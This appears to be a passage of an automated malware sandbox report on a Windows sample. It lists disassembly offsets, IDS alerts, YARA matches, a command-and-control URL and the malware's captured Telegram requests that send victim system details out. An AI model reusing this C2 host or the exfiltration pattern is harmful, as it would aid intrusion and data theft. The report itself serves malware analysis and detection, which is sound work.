Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C5107h	3_2_292C4D98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C9090h	3_2_292C8D98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C6588h	3_2_292C6290
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C42B6h	3_2_292C3FE8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C73E0h	3_2_292C70E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CE1D8h	3_2_292CDEE0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C22C6h	3_2_292C1FF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CC9F0h	3_2_292CC6F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C9EE8h	3_2_292C9BF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C3997h	3_2_292C36C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C60C0h	3_2_292C5DC8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CF9C0h	3_2_292CF6C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CCEB8h	3_2_292CCBC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C19A6h	3_2_292C16D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292CB6D0h	3_2_292CB3D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C079Eh	3_2_292C04D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 292C8BC8h	3_2_292C88D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29301190h	3_2_29300E98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29300800h	3_2_29300508
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29300CC8h	3_2_293009D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29300338h	3_2_29300040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_29323548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	3_2_2932EE90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	3_2_2932EE98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_29320006
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_29320040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_29323538
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, 000003E8h	3_2_29AF08B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	3_2_29AF0630
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, 000003E8h	3_2_29AF08A9
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then push 00000000h	3_2_29AFECB6
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	3_2_29AF0628
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	7_2_299DDC80
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_29FFEDFB
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_29FFEC1B
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29FFE0C5h	7_2_29FFDF07
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 29FFE0C5h	7_2_29FFE114
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_29FFE5E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0185Dh	7_2_2DF01440
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0FDA9h	7_2_2DF0FB00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF010E9h	7_2_2DF00E38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0F0A1h	7_2_2DF0EDF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0BC81h	7_2_2DF0B9D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0EC49h	7_2_2DF0E9A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0B829h	7_2_2DF0B580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0E7F1h	7_2_2DF0E548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0E399h	7_2_2DF0E0F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0DF41h	7_2_2DF0DC98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0DAE9h	7_2_2DF0D840
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0D691h	7_2_2DF0D3E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0D239h	7_2_2DF0CF90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0185Dh	7_2_2DF0178B
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0CDE1h	7_2_2DF0CB38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0C989h	7_2_2DF0C6E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0F951h	7_2_2DF0F6A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0C531h	7_2_2DF0C288
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0F4F9h	7_2_2DF0F250
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF0C0D9h	7_2_2DF0BE30
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF168FDh	7_2_2DF165C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1AA0Eh	7_2_2DF1A740
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF17DC0h	7_2_2DF17AF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF118A1h	7_2_2DF115F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1AE9Eh	7_2_2DF1ABD0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1CE8Eh	7_2_2DF1CBC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF14471h	7_2_2DF141C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1EE7Eh	7_2_2DF1EBB0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF11449h	7_2_2DF111A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1BC4Eh	7_2_2DF1B980
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov esp, ebp	7_2_2DF19B88
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1701Ah	7_2_2DF16F70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF14019h	7_2_2DF13D70
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1DC3Eh	7_2_2DF1D970
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1FC2Eh	7_2_2DF1F960
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1701Ah	7_2_2DF16F69
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF16411h	7_2_2DF16168
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF10FF1h	7_2_2DF10D48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1C9FEh	7_2_2DF1C730
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1E9EEh	7_2_2DF1E720
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF15FB9h	7_2_2DF15D10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF13BC1h	7_2_2DF13918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF10B99h	7_2_2DF108F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1B7BEh	7_2_2DF1B4F0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1D7AEh	7_2_2DF1D4E0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1517Bh	7_2_2DF14ED0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1F79Eh	7_2_2DF1F4D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF13769h	7_2_2DF134C0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1A57Eh	7_2_2DF1A2B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF15B61h	7_2_2DF158B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1C56Eh	7_2_2DF1C2A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF12151h	7_2_2DF11EA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1E55Eh	7_2_2DF1E290
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF10741h	7_2_2DF10498
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF14D21h	7_2_2DF14A78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1B32Eh	7_2_2DF1B060
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF15709h	7_2_2DF15460
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF13311h	7_2_2DF13068
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF11CF9h	7_2_2DF11A50
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1D31Eh	7_2_2DF1D050
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1F30Eh	7_2_2DF1F040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF102E9h	7_2_2DF10040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF148C9h	7_2_2DF14620
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1C0DEh	7_2_2DF1BE10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF1E0CEh	7_2_2DF1DE00
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8EB68h	7_2_2DF8E870
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF85730h	7_2_2DF85438
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF822C6h	7_2_2DF81FF8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8C9F0h	7_2_2DF8C6F8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF89EE8h	7_2_2DF89BF0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF842B6h	7_2_2DF83FE8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF873E0h	7_2_2DF870E8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8E1D8h	7_2_2DF8DEE0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF819A6h	7_2_2DF816D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8B6D0h	7_2_2DF8B3D8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8079Eh	7_2_2DF804D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF88BC8h	7_2_2DF888D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF83997h	7_2_2DF836C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF860C0h	7_2_2DF85DC8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8F9C0h	7_2_2DF8F6C8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8CEB8h	7_2_2DF8CBC0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF81086h	7_2_2DF80DB8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8A3B0h	7_2_2DF8A0B8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF878A8h	7_2_2DF875B0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF83076h	7_2_2DF82DA8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8E6A0h	7_2_2DF8E3A8
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8BB98h	7_2_2DF8B8A0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF85107h	7_2_2DF84D98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF89090h	7_2_2DF88D98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF86588h	7_2_2DF86290
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF82756h	7_2_2DF82488
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8D380h	7_2_2DF8D088
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8A878h	7_2_2DF8A580
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF84746h	7_2_2DF84478
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF87D70h	7_2_2DF87A78
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF81E36h	7_2_2DF81B68
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8C060h	7_2_2DF8BD68
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF80C07h	7_2_2DF80960
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF89558h	7_2_2DF89260
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF83E26h	7_2_2DF83B58
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF86A50h	7_2_2DF86758
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8D848h	7_2_2DF8D550
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF81516h	7_2_2DF81248
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8AD40h	7_2_2DF8AA48
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8030Eh	7_2_2DF80040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF88238h	7_2_2DF87F40
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF83506h	7_2_2DF83238
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8F030h	7_2_2DF8ED38
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8C528h	7_2_2DF8C230
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF89A20h	7_2_2DF89728
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF86F18h	7_2_2DF86C20
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF82BE6h	7_2_2DF82918
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8DD10h	7_2_2DF8DA18
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8B208h	7_2_2DF8AF10
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF84BD6h	7_2_2DF84908
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF88700h	7_2_2DF88408
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF85BF8h	7_2_2DF85900
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DF8F4F9h	7_2_2DF8F200
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DFC1190h	7_2_2DFC0E98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DFC0CC8h	7_2_2DFC09D0
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DFC0800h	7_2_2DFC0508
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then jmp 2DFC0338h	7_2_2DFC0040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2DFE3548
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	7_2_2DFEEE98
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]	7_2_2DFEEE90
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2DFE0040
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2DFE0031
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2DFE0356
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	7_2_2DFE3538
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, 000003E8h	7_2_2E9B0970
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	7_2_2E9B0630
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then push 00000000h	7_2_2E9BECB6
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, 000003E8h	7_2_2E9B0960
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Code function: 4x nop then mov ecx, dword ptr [ebp-40h]	7_2_2E9B0628

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49751 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49783 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49794 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://amazonenviro.com/245_Aiymwhpjxsg

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 12.2.jphwmyiA.pif.1e190000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cc99de.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250b99de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.250ba8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350ee8.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b3099de.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29f60000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.2a120000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.3.jphwmyiA.pif.2352c260.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.jphwmyiA.pif.27e8ce70.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.27870000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.jphwmyiA.pif.25350000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1d9f0ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.jphwmyiA.pif.1b30a8c6.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.jphwmyiA.pif.29cca8c6.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4139773880.000000001E190000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4135902122.0000000025350000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4137756454.0000000029F60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.4138432977.000000002A120000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4138952220.000000001D9F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4141125623.0000000027870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\yxU3AgeVTi.exe

Code function: 0_2_0294E72C InternetCheckConnectionA,

0_2_0294E72C

Source: global traffic

TCP traffic: 192.168.2.4:49770 -> 208.91.198.176:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:33:20%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2013:03:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2006/01/2025%20/%2014:23:12%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

